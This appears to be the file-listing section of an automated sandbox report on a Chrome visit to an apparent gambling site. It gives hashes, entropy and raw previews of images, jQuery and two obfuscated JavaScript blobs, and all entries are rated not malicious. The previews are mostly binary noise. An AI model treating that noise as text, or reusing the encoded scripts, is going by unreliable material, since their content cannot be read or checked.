                                                                                                                                                          SHA-256:B81CE37014C4A9C55AED942D8C816281137CA8BCA71990E9EE34EE4725A63B5A
                                                                                                                                                          SHA-512:1966EF4EE1A1D88D8D0A8621A670F4052156D2A7EF39DD7560E62B90A3C4B09EA92152193674F3EBBAD1C85ECF53C8BCA450E28C9608C03263A16A2BA5EB88BB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/game_jk.png
                                                                                                                                                          Preview:.PNG........IHDR...............^.....PLTE.................'..20*. ................+..*..%.. .. rtt.u..q.WM.WXX....)dff..0..1..$.r............................xxx..5..*..%..$..$..#.........}t>.r!.{.wh.pd.|m.vg.4/....xk.pd.TK.LC.c`G..7.....0..(hd UP.E@.JG3ooo___od...).y............!.....$..%qd.`U.JA.!......|....wo#...Z[[pc.$".l_.577aV.}}}E<.79992.[\\GHKOOOI@.<>>...4..LLL"..DDD'$.677...+++....................-.).............4.2.0............................7../.....-.+.+.)..(.."^.}....ytRNS.(HJ....K,&....................4/"............................................................................|wmiaTPKB...a.C....IDAT(...C..Q.....m.m.m.U.....'9'[.,wz!+3....O..w...0.8.c8.."R}.8.b|z^<..\[j..P....j......y......yMX..)T....U..6p[...2_..._)J.d..T...t..4..}y2..,.(D)ZW.Cju.fR.>c...r....c.-..a.|W7.B...>.@.~O.v&...cty.w|..n....&gfG...0M.Bn/....<..Jc....!+....5.1Ch.....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3219
                                                                                                                                                          Entropy (8bit):7.711830310077625
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:/AvnLBdhEO4B8J3eG4kmYKCuOgitMI3+qSkcq1V1YrczmB4Zw75zzTyqOOuBYU8V:o+e4k6Ogm3+qSkcO89757yqOT8tyg
                                                                                                                                                          MD5:0D27A69210BB7A013C4C8A5818F8445D
                                                                                                                                                          SHA1:9ED20EF367552AC7809114B8F76AA9047DFEDE37
                                                                                                                                                          SHA-256:264AB3FB1C82264D29253449D8E575D0725BE16E4573A3C58019EAC6A643F191
                                                                                                                                                          SHA-512:25578DF3098B24D4C670838978669510621C78FF04CA8A876E18F1044732B552F14069C5C9B2AEF797A481ED298A2699AC14B4B80D9A3CEBC6A8503D04AAC226
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<...riTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:420a253f-21eb-c14d-bee9-9f8f530514c9" xmpMM:DocumentID="xmp.did:A2A375E8A9E311E89D04D1A68640F071" xmpMM:InstanceID="xmp.iid:A2A375E7A9E311E89D04D1A68640F071" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:e3ebebca-fdfe-7542-a464-e0c8b8192ae8" stRef:documentID="xmp.did:B8082874819511E78C02F58BB957D46E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx..W...g..}.............r.[.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 28 x 25, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1513
                                                                                                                                                          Entropy (8bit):7.070474271774515
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:uv1hfvWwjx82lY2T3JVk4OayJ3Vs9B2DfGjki3SZnTZ4gzYOoKRDfAZPFwC9zo:u9ANn2NOJ39mki3SAujAZPiCo
                                                                                                                                                          MD5:FA2F138FACFA75834F09545A66BE4168
                                                                                                                                                          SHA1:FAEB3D65BC294BB4C7D39EDB144159D0FA8431C1
                                                                                                                                                          SHA-256:01A9370C1A83DED73A45DE952B44D6641DA0BE9A9CC134C98FA8F49CAD1966B4
                                                                                                                                                          SHA-512:3E04C912739227C0AC73F55F42B0C7F9C9CFD9E7947A87DEC86D8470B2E16259541545EB9CCE5988B940A6ADB21AE63265BDB76A6C606E395331CD04EBCB0FA3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/index/383/menu/nv6.png
                                                                                                                                                          Preview:.PNG........IHDR.............".N'....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:6F7CE2D250A211E7A2A4CE85D6EC7AAB" xmpMM:DocumentID="xmp.did:6F7CE2D350A211E7A2A4CE85D6EC7AAB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6F7CE2D050A211E7A2A4CE85D6EC7AAB" stRef:documentID="xmp.did:6F7CE2D150A211E7A2A4CE85D6EC7AAB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.]....YIDATx...h.Q...{.;.;..DY.B..R(..I&.%)...$.54?VH-.Z.c..&bIL...$!.%.S.d).}.....y...uw...s..y..~.]..yA*a.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2401
                                                                                                                                                          Entropy (8bit):7.491652601095067
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:0AinNuijQeJ39cm+E0veEgEeSre0+1K42JkgUOID8KcVJIyG4GbP:yNyq1ZEgvKIaHVJIyG4uP
                                                                                                                                                          MD5:0E3F06E91941C96F4083D1E3D90FDF1D
                                                                                                                                                          SHA1:E4EC0428EBAEC848303C7487C2825771A9F5953C
                                                                                                                                                          SHA-256:1D234FE55D0DBCE915A70854A21F571F7D355EA7A8A36512772FA392F11C2302
                                                                                                                                                          SHA-512:9F67A78D04A8C480448016E6C975FBB9DFA3C8144DCB59368A68A04B796DCFC6907183BB247B66FF0B733CEFF1673655BFC9BA623F949ADD3C915AA552E03CBC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/card_fg.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:17BBB51BCE49E711A809823CCFAF5CCB" xmpMM:DocumentID="xmp.did:14393DBDA3A111E98C4BF8052F0E358A" xmpMM:InstanceID="xmp.iid:14393DBCA3A111E98C4BF8052F0E358A" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E3DAAB8FF77711E7B122FFEE1F631D5E" stRef:documentID="xmp.did:E3DAAB90F77711E7B122FFEE1F631D5E"/> </rdf:Description> </rdf:RDF> </x:xmpme
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (3468), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3468
                                                                                                                                                          Entropy (8bit):5.915282977533667
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:Vfm2C8Biv6f5cWWvasq0ckQvvOMN5Xikyz72vfT0uR:VFl8v6f5cksq0cJvv5XSL/23AC
                                                                                                                                                          MD5:05BDE0EE825B9E3F950E5258951D93F2
                                                                                                                                                          SHA1:BF04E455DB94F13E8A243F0EA65037D52DF51710
                                                                                                                                                          SHA-256:C0E0E4CA826CF9D52875B54C5B83ED63E540FA32901A90F8B8E1BF5B5E888965
                                                                                                                                                          SHA-512:626F49C2DBF0FDD7617A5482EDE738B72F15CA267267A4E1F4F7CD6B3279DEC81863B02E7603570CD52AAEB80738B10AAE4B62A6EC2AED88642A9416CC85B183
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/normalCaptcha.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgFZCBdAGgG8BRAS0PwC4AzAVzRgBcb1MOyQyUAJQUARCyQgABEg4AnGp1EBuAPJgAViE4A6ACYgmNNCAAKclBBByOAT0wDRAfScgkAWRR6WAGxCjKADcoHxYQBgBCAAYAXyFlYLkZAF4oTFEAET0ADmBRITIUVJ00TCQCtFT0qJgIJnyyGirRADkATQAPVQaYZoyWAHoAJgafZMwUTCFMChiydS1OTBodAFsoCABxEA4Oa3KcUTQUOXWfAGENjhgACyhREiECyenZ+c1tDmW1jfcWDigXHQBwokg4LROZ0uEGudwYMB07jilDkhlRSBuzDYnG4pREiSkHGSHBuNCQyhJZJ0HBQLFuAGp6WRKUgdGSADIoKB6YwAc2S0TIYIAKjRViBaV9WOwgXiKKiOCw5GhCWykJzuXyBbg5rgQPghHM9CgAMosMCrGgcLEy3FTeU7JUqlk6GBeEDE0mst0GVkaFDGdINND6QxQXwcHQAVS4PjVACEfFA0HBeF7Xe6hAB+EMGJjhnyRmM0OM0qCydKAaajABzxgFNFQAxWYBB6MAgB75BgDAA6egoABYYgNqW4vi6fSBs2mqcdTiFobCoK6Qj4wLBUyP3cz03AQLYCoEA3pCemwRDpxcrrc0qCbihgJEdU8GLmwxHo7HqVyK6Im83AKP6gG8MwB6M0AbbVAFl5QAHU0AdW18iNFBzh8FBJBtHEeBEF1j0hGdzzuGYMRvO9kRdKcoSw+cYGTGA/EuHwlxXKY5jBWcLwAaW3JDZV4VDN23Yk5hMDprWlZDSg4fEoCSD1IwBOReR2ZQaCYBwdGCUIQB0Pw0F5ElkmSVT1g6dkQA0kkhCYE5MAJKBkmNGAWHFNBIxkjgqD8OyOHjWwAEk9HSPYfAAdTkDZ8h0RznJAVykHc4UoF5FooHFdJjAgf4GiQZIomUJAAB553UzSbkyxkhHkzAoGwJAS
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 26, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1757
                                                                                                                                                          Entropy (8bit):7.310121470980193
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:Z1hNo7FCWwjx82lY2T3/VNR+SyJ3VNQ+hGg+efPv8mzru8JVmxU9f6jgO2UAWNhc:nzo7FDNn2DjIZJ3jXhmeTu8V9y2COz
                                                                                                                                                          MD5:0CC5998363540823C70F1725C6638867
                                                                                                                                                          SHA1:3342B950B90E1AF48C5E5411B019C01882086F2E
                                                                                                                                                          SHA-256:08939C87B5409CF0C7561180F7A163E9BDA7405B9B2F18403954945FD0AD962A
                                                                                                                                                          SHA-512:7524D0A671894311FC881B26C049804A110ADA3037DE843B46AFF7172ECE9D402547B72CCFDE7075323C2F0A670599DC4D8D31B8E67E306AD92D83F848C91C09
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/index/121/nav/fishingico.png
                                                                                                                                                          Preview:.PNG........IHDR............./.{.....tEXtSoftware.Adobe ImageReadyq.e<...!iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:A93A8271A6D711E993B898AEDE63CA80" xmpMM:DocumentID="xmp.did:A93A8272A6D711E993B898AEDE63CA80"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A93A826FA6D711E993B898AEDE63CA80" stRef:documentID="xmp.did:A93A8270A6D711E993B898AEDE63CA80"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>!V6....RIDATx.b...g..`b...9F......U........$s=,..s...5...y..._...e..d{.......`_....+.-!..4....L.b.....r.hO.#.>...0..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 50 x 36, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4592
                                                                                                                                                          Entropy (8bit):7.858171152982243
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:uYR25AjLna4MK04BGrfs7hG9nYuLyHQOCxbM9Qml4lc:/FXa4MKvkrghG9Yk8Ct0Wc
                                                                                                                                                          MD5:51FDF17068E84A28557E6E3A2B5E2DBB
                                                                                                                                                          SHA1:13E1E46E5C4A197AA3E0D28E60291D94519B8388
                                                                                                                                                          SHA-256:0FEE5018735220F2F1E5FE7871304A114DE261E21802F50B6598F63081822805
                                                                                                                                                          SHA-512:3AF1BB9FE30F98D0F69C897075A1D3F4E8ABB2ACF66A858D8B147E56E5F98AFD79B06A5D3F61199784CB9A704FEDB3D353AFD99952978BF6E15F314127FF0B14
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/live_allbet.png
                                                                                                                                                          Preview:.PNG........IHDR...2...$......i7....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmpMM:InstanceID="xmp.iid:E2B0A30B4EB611E9B6AF98114C107AF1" xmpMM:DocumentID="xmp.did:E2B0A30C4EB611E9B6AF98114C107AF1"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E2B0A3094EB611E9B6AF98114C107AF1" stRef:documentID="xmp.did:E2B0A30A4EB611E9B6AF98114C107AF1"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......`IDATx..XytS..=.i.%K.e.W.6....c0..`6......H&.!L.0..dJI...4i.Rj.4..Y..3.,....[..ly.%k..'i..?fJs.s.?..{.;..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (32089)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):92630
                                                                                                                                                          Entropy (8bit):5.303540999101494
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:dnu00HWWaRxkqJg09pYxoxDKMXJrg8hXXO4dK3kyfiLJBhdSZE+I+Qg7rbaN1RUp:ddkWgoBhcZRQgmW42qw
                                                                                                                                                          MD5:663628F795CB62444143FDE1EBDF2B5B
                                                                                                                                                          SHA1:1EC97B491C8A1C72055BD635F0C8DD843CAE43D6
                                                                                                                                                          SHA-256:AA084D3968AB19898EBBED807EBC134B622FAB78A888E7B36AE8386841636801
                                                                                                                                                          SHA-512:01FB64FCF0D44B95FD55813FF8E7521DF6E44B9CA3A7F4FCD4A185578833876FCE198C60EE2D937197545A12C3030F91DBD88ACAB62DC4213A8168C64E0C5D2D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/lib/jquery.min-1.9.1.js
                                                                                                                                                          Preview:/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, baseline, precision 8, 659x544, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):75656
                                                                                                                                                          Entropy (8bit):7.973251684846932
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:aFt/QuDmbbvL7nMJ2DFOH9+8MFYPy2cKLnruYN1hM173nJ/s+YXxnFSj/dzvQ:uQs2DswFI9hfcIiYK5nObXLSLFvQ
                                                                                                                                                          MD5:B8D7A960A4B6C034F047FF01DD4D9C43
                                                                                                                                                          SHA1:59196BB3341EA91A5A55270224A76FDC20E0EA54
                                                                                                                                                          SHA-256:9F8AFC863F5B3C95ACB8B8006DBF54857C58C904170D2F89B372F0F29887923F
                                                                                                                                                          SHA-512:6613A02E861D4EAE2B2FFDAA58E8AE493855A831CA43D33C57AA54178509A0E0E02B5B0F1032F10EB912BE450447D3295209DD805C69FB740E613EB759FD923B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/guide.jpg
                                                                                                                                                          Preview:.............................................................................................................................................S....Adobe.d........... ..............................................................................................!1.A.."Qa.q.2...#B..R..b...$3r...C...%cs.45T..........................!1..AQa.."q2.B..#R..34.............?..l.3.+M..~.oe.I.YO..I.......*."*<v.HvI..'...L..\....On.Hd...d..Oo.`l9(.>....,.....2%.%...$E.tV.....l.m....Z.Y#l...Sh.~PF..5v{I...4&k,..Sp..6.;W.dv.,.....q...A.F..l.6. k.......L.u..@.e.....0....C....b4t.l..;f..6........&.#....aK.4..#..W..q..X|.b.G!..wjp.'*.3d..nT^{...../&..FoJ...#s..(..Q......).bn.2TsbM..6......UI.....Tk..C..l.).......+TJ.*.4..:..%.6Q......U.lGlNx...0...j$...(M.4./#N.tBL6.s...~.....E.d.r...lY[..#..o...5....;.tr....^AW.r.%..S|..C.....dpqy..7lT....7.......S..Z=...v..............U..g%.J'..9..l..g.{E,TT.... .G....d}.....V.....\....X$|.....~.........I6.7...7.,mFR<'...>m./..{...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 1000 x 100
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):41295
                                                                                                                                                          Entropy (8bit):7.942541981139238
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:y2NQx9ygf1S1ta2Wp7LnEiyDUCeAy1JI1r/kvFsDb2:y2NQ1tSXWp7Lfy4hIl/w
                                                                                                                                                          MD5:CC6C3902D682170F4529B42F9059ADD3
                                                                                                                                                          SHA1:5BFFB834B185D941DEDB916706C27628B1E18DF8
                                                                                                                                                          SHA-256:1CEA6DBF9C84870B866D1A1ED383736A2175C95B260E71775FED2EFEB8AC737D
                                                                                                                                                          SHA-512:AB4ECEA534149F0DDAABAC7B70A9C0E99F1DA8EBEE7F3C3076EB5A58411A4289BDE4E63E6A2C87F0E5893547EDE8B89939C415837206A30EBCC7CEB9CCBC92D7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:GIF89a..d...........e.......gj,M........P.....mWU.....Q.......e]..... ..%.............r..........GV.....................e..1.........zQ/)...........ql.n....e...................#..........(.....8.xn.......c......*)3..................T.............UR5(...........N*.....7...v....U..........f[.i.:.....mF9..nl.N"..{..7..v..........g....!.y.....&........s.j2.UK...S...e.....T.lWo|...F...&....,....o.O.V.......QM.9(..3...h...t......]........I/.......8..[j...1,..4!......u..u|....O...........s.............)/Jw.......J..j7....Rq......wg......T..."....z...P.......TI...................B..08......."5...'.....}..yO..B...............w.......x..4lxv??5@.......*.r..........!.....................................;...............!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 36 x 37, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2164
                                                                                                                                                          Entropy (8bit):7.4927303381860115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:4ANn2N9/MJ39EggZ4Wkx/vlo7RKaRoLyeWlGMI6Yds:B2//8EggZ5ktv67DR9IBs
                                                                                                                                                          MD5:19E70F056D36490F5E8A1741F389D75E
                                                                                                                                                          SHA1:641064D7DA3FFC885424570E32EA9E1E972AFDED
                                                                                                                                                          SHA-256:FEDC19B12329A41B5B95CB9A351F95D9884A8AA88AD59C3B497A8F241550B219
                                                                                                                                                          SHA-512:2EB54B7287055AD2FC2556D102A16C013BF0EF21C54F5593AB6FC4133548F1B02EF0AD26C5EA19BEB2CCCA0E1924BC66679186DCDD1AB677833413170EC222BD
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...$...%......>.j....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:4BAA211450A511E7AE36B7CC5EC786C8" xmpMM:DocumentID="xmp.did:4BAA211550A511E7AE36B7CC5EC786C8"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4BAA211250A511E7AE36B7CC5EC786C8" stRef:documentID="xmp.did:4BAA211350A511E7AE36B7CC5EC786C8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>-.G.....IDATx.W[S[U.NNN ...$...BB..@.j...Z.v|..._._}.._..p...O.}p$UpF.RH..$.p....C..r."..$...z8...}Y.[.b.7.X.Fr8
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (524), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):524
                                                                                                                                                          Entropy (8bit):5.693923508143326
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:4chWOBPpz+6XjT1KLaOzGwQqSNCMSjBplsn:VPXjB0bzGJCXTls
                                                                                                                                                          MD5:A3B5EC76C93B2B6C6089B2DA7D769423
                                                                                                                                                          SHA1:2160D6BE917DAE6BA2C9BCC818CBBA5EC1B8623E
                                                                                                                                                          SHA-256:56FF674682F6EFACC12D31F2FD7361C281165FBC5E6CC4F3207BE6F3AD27AB9B
                                                                                                                                                          SHA-512:18E1DCC795BEE5A85B5E451E40F75DC998C142061C08794EA0FB5771C8C408AF00F5FE8B455492A36921BA6B2061F73B629EDC010999DEC1C086E358930DAE3B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/t4091-otherConf-js.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtALAVgF0AaAbwC0AzBAJgC5KBXNGAFwEt1M1iRiwAlKQBEjJCAAESVgCd2bYQG4A8mABWINgDoAJiErs0IAAoyUEEDNYBPTH2EB9ByCQBZFDsYAbEMLIA3KC9GEDoAQgAGAF8Bfl07YmEddiQoMB8AZRBWDjQAcz8mFg4uIRlsxhk0CRQYuJ0E4QBHGQBhDxAACRQAW19iIrZONEwyiqqJGTqwePsYKBkdUxR/dj0ZAFEADxhgvULmIdLSctZK6qgYxUCZSYBeYQALfD8UO9J5xYAZFDAwazopDAUDQRhk4QAjMQjMAkJCosRVnoUD8/gCgSCwZDoSBYfDiHkoH1Uf9AcDQZZsTC4WEIQidCgYCT0eSsbScXjaQjynlmWTMZT2dT8QYkI8+RiKeChbiaXTiEgICgrEgJazBVDhVziD1fuwfGqBdLNbL8TBHlBWIapVTTdqIGZdda2SbOXSEVA7thhMAAF7CQhRK5AA")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 26, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1753
                                                                                                                                                          Entropy (8bit):7.2761607200975185
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:Z1hNo7FCWwjx82lY2T3/VjVfHVPyJ3V5V2DVYGurcu5lZ+Jjp+yuOxOu2bCYWD6G:nzo7FDNn2DEJ3x2Six92TP3nPj9K9
                                                                                                                                                          MD5:5C967CC810AB472E43717C008C717FD9
                                                                                                                                                          SHA1:EB9D5C74A8A87DCDB570193DA7FFFFB43DFC0F89
                                                                                                                                                          SHA-256:901DF62919692708A4713E4F155CD839EE60493CB3B7861DDF28BDF27E5D3089
                                                                                                                                                          SHA-512:51AE08C7C9F1C0CED235240DDD943D93D6956221D7BBAE74F803C2839B932F5FFA2C54BE62618FF37D9B73ED584FDFA6F5BF39731262F8662C9473062FF2051C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/index/121/nav/homeico.png
